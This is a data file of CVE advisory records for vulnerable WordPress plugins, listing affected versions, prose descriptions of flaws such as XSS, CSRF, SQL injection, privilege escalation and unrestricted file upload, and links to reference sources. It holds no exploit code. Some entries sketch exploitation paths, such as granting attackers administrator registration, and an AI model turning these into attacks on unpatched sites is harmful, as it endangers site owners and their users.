{"CVE_ID":"CVE-2024-37218","slug":"page-builder-sandwich","versionImpact":"5.1.0","description":"Missing Authorization vulnerability in WordPress Page Builder Sandwich Team Page Builder Sandwich \u2013 Front-End Page Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Page Builder Sandwich \u2013 Front-End Page Builder: from n\/a through 5.1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-sandwich\\\/wordpress-page-builder-sandwich-5-1-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-sandwich\\\/wordpress-page-builder-sandwich-5-1-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11323","slug":"ai-quiz","versionImpact":"1.1","description":"The AI Quiz | Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ai_quiz_update_style() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-quiz\\\/tags\\\/1.1\\\/functions.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-quiz\\\/tags\\\/1.1\\\/functions.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10322","slug":"brizy","versionImpact":"2.6.8","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/brizy\\\/trunk\\\/admin\\\/svg\\\/main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/brizy\\\/trunk\\\/admin\\\/svg\\\/main.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brizy\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brizy\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2ef7c3-4610-4e8b-ab27-2d6cbdbed097?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2ef7c3-4610-4e8b-ab27-2d6cbdbed097?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2483","slug":"gift-certificate-creator","versionImpact":"1.1.0","description":"The Gift Certificate Creator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018receip_address\u2019 parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-certificate-creator\\\/trunk\\\/giftcertificates.php#L312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-certificate-creator\\\/trunk\\\/giftcertificates.php#L312\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-certificate-creator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-certificate-creator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbebe61-3adc-4ba1-8767-863dc2310cad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbebe61-3adc-4ba1-8767-863dc2310cad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5930","slug":"wp2html","versionImpact":"1.0.2","description":"The WP2HTML plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/admin.class.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/admin.class.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/main.class.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/main.class.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac34e369-de9e-4b13-8858-0b4300aef5f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac34e369-de9e-4b13-8858-0b4300aef5f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8720","slug":"wp-readme-parser","versionImpact":"1.3.15","description":"The Plugin README Parser plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018target\u2019 parameter in all versions up to, and including, 1.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-readme-parser\\\/tags\\\/1.3.15\\\/includes\\\/generate-output.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-readme-parser\\\/tags\\\/1.3.15\\\/includes\\\/generate-output.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-readme-parser\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-readme-parser\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aad6151a-6897-4d0c-9dfb-0f424c683111?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aad6151a-6897-4d0c-9dfb-0f424c683111?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1024","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the regenerateSitemaps function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to generate sitemaps. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3f835e-0aa9-4581-9150-fe5041e0f293\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3f835e-0aa9-4581-9150-fe5041e0f293\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2188","slug":"colibri-page-builder","versionImpact":"1.0.227","description":"The Colibri Page Builder for WordPress is vulnerable to SQL Injection via the \u2018post_id\u2019 parameter in versions up to, and including, 1.0.227 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/utils.php#L556\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/utils.php#L556\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c73d4b78-72aa-409a-a787-898179773b82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c73d4b78-72aa-409a-a787-898179773b82?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922722\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922722\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6941","slug":"infusionsoft-official-opt-in-forms","versionImpact":"1.0.11","description":"The Keap Official Opt-in Forms WordPress plugin through 1.0.11 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f7c9aa-5e59-468f-aba9-b15e7942fd37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f7c9aa-5e59-468f-aba9-b15e7942fd37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4729","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4. This makes it possible for unauthenticated attackers to change the LadiPage key (a key fully controlled by the attacker), enabling them to freely create new pages, including web pages that trigger stored XSS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db707507-c53f-45b8-a8e1-7fea1c6f8f3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db707507-c53f-45b8-a8e1-7fea1c6f8f3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4005","slug":"social-pixel","versionImpact":"2.1","description":"The Social Pixel WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02ca09f8-4080-4969-992d-0e6afb29bc62\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02ca09f8-4080-4969-992d-0e6afb29bc62\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5669","slug":"faq-for-woocommerce","versionImpact":"1.6.4","description":"The XPlainer \u2013 WooCommerce Product FAQ [WooCommerce Accordion FAQ Plugin] plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ffw_activate_template' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to store cross-site scripting that will trigger when viewing the dashboard templates or accessing FAQs.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a404de-ee26-44af-9e4f-f93694da7a77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a404de-ee26-44af-9e4f-f93694da7a77?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L471\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L471\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1384","slug":"auxin-portfolio","versionImpact":"2.3.3","description":"The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_recent_portfolios_grid' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4475cbd4-07cf-499a-a11a-b63eb9184568?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4475cbd4-07cf-499a-a11a-b63eb9184568?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/trunk\\\/includes\\\/elements\\\/recent-portfolios.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/trunk\\\/includes\\\/elements\\\/recent-portfolios.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10367","slug":"otter-blocks","versionImpact":"3.0.4","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d83c085-b33a-4003-9e0a-8457669d6634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d83c085-b33a-4003-9e0a-8457669d6634?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/otter-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/otter-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178637\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178637\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11385","slug":"pure-css-circle-progress-bar","versionImpact":"1.2","description":"The Pure CSS Circle Progress bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'circle_progress' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-css-circle-progress-bar\\\/trunk\\\/pure-css-circle-progress-bar.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-css-circle-progress-bar\\\/trunk\\\/pure-css-circle-progress-bar.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c098c975-3a9b-4b6c-81e7-c66ca9e3d09c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c098c975-3a9b-4b6c-81e7-c66ca9e3d09c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11292","slug":"wp-private-content-plus","versionImpact":"3.6.1","description":"The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c46b91-e371-480f-943a-3906d8b6bbba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c46b91-e371-480f-943a-3906d8b6bbba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0511","slug":"usc-e-shop","versionImpact":"2.11.9","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018name\u2019 parameter in all versions up to, and including, 2.11.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/usc-e-shop\\\/trunk\\\/functions\\\/settlement_func.php#L612\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/usc-e-shop\\\/trunk\\\/functions\\\/settlement_func.php#L612\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235131\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235131\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/usc-e-shop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/usc-e-shop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c26270b-a0a7-4877-aa66-bffe260003df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c26270b-a0a7-4877-aa66-bffe260003df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2005","slug":"front-end-only-users","versionImpact":"3.2.32","description":"The Front End Users plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the file uploads field of the registration form in all versions up to, and including, 3.2.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/plugin\\\/front-end-only-users\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/plugin\\\/front-end-only-users\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/102223a1-07f5-485b-a6af-49cf316d9797?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/102223a1-07f5-485b-a6af-49cf316d9797?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10677","slug":"bluetrait-event-viewer","versionImpact":"2.0.2","description":"The BTEV WordPress plugin through 2.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1bd4216-798a-4e45-a0ba-3699f0af3c7a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1bd4216-798a-4e45-a0ba-3699f0af3c7a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5928","slug":"wp-sliding-logindashboard-panel","versionImpact":"2.1.1","description":"The WP Sliding Login\/Dashboard Panel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the wp_sliding_panel_user_options() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sliding-logindashboard-panel\\\/trunk\\\/wp-sliding-login-dashboard-panel.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sliding-logindashboard-panel\\\/trunk\\\/wp-sliding-login-dashboard-panel.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7c679e-392c-40cd-b768-d78fae6065bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7c679e-392c-40cd-b768-d78fae6065bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5845","slug":"affiliate-reviews","versionImpact":"1.0.6","description":"The Affiliate Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018numColumns\u2019 parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-reviews\\\/trunk\\\/templates\\\/blocks\\\/block-reviews-grid-style.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-reviews\\\/trunk\\\/templates\\\/blocks\\\/block-reviews-grid-style.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-reviews\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-reviews\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd11b05-feb0-4e32-b11d-9c8f10ddf30a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd11b05-feb0-4e32-b11d-9c8f10ddf30a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8091","slug":"eventon-lite","description":"The EventON Lite plugin for WordPress is vulnerable to Information Exposure in all versions less than, or equal to, 2.4.6 via the add_single_eventon and add_eventon shortcodes due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar_generator.php#L954\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar_generator.php#L954\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-event.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-event.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/class-evo-shortcodes.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventon-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventon-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/421fcee2-a05d-4486-837e-ddee3d73d737?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/421fcee2-a05d-4486-837e-ddee3d73d737?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1023","slug":"wp-meta-seo","versionImpact":"4.5.3.","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the saveSitemapSettings function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to change sitemap-related settings of the plugin. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of 